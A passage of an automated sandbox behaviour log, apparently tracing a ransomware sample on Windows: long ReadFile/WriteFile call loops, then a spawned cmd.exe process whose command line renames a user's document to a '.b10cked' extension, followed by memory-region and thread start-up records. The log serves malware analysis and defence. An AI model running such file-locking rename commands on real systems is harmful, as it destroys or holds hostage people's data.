0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.400] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.400] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.401] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.401] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.402] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.402] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.404] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.404] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.405] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.405] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x32, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x32, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.405] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.405] _close (_FileHandle=4) returned 0 [0235.405] FindNextFileW (in: hFindFile=0x410e90, lpFindFileData=0x22f1fc | out: lpFindFileData=0x22f1fc) returned 0 [0235.406] GetLastError () returned 0x12 [0235.406] FindClose (in: hFindFile=0x410e90 | out: hFindFile=0x410e90) returned 1 [0235.406] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.406] _close (_FileHandle=3) returned 0 [0235.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.407] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.407] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.407] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.407] SetConsoleInputExeNameW () returned 0x1 [0235.407] GetConsoleOutputCP () returned 0x1b5 [0235.407] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.407] exit (_Code=0) Process: id = "634" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c60" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35051 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35052 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35056 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 35057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35426 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35427 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35428 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35429 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35430 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35431 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35432 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35433 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35434 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35438 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35439 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35440 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35441 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35442 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35443 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35444 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 35445 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35446 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35447 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 35448 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 35449 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 874 os_tid = 0xb18 [0235.068] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb4c | out: lpSystemTimeAsFileTime=0x14fb4c*(dwLowDateTime=0xbf91e7c0, dwHighDateTime=0x1d440a9)) [0235.068] GetCurrentProcessId () returned 0x998 [0235.068] GetCurrentThreadId () returned 0xb18 [0235.068] GetTickCount () returned 0x408b6 [0235.068] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb44 | out: lpPerformanceCount=0x14fb44*=29185741968) returned 1 [0235.069] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.069] __set_app_type (_Type=0x1) [0235.069] __p__fmode () returned 0x76b331f4 [0235.069] __p__commode () returned 0x76b331fc [0235.069] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.069] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.069] GetCurrentThreadId () returned 0xb18 [0235.069] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb18) returned 0x38 [0235.069] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.069] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.070] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fadc | out: phkResult=0x14fadc*=0x0) returned 0x2 [0235.070] VirtualQuery (in: lpAddress=0x14fb13, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery 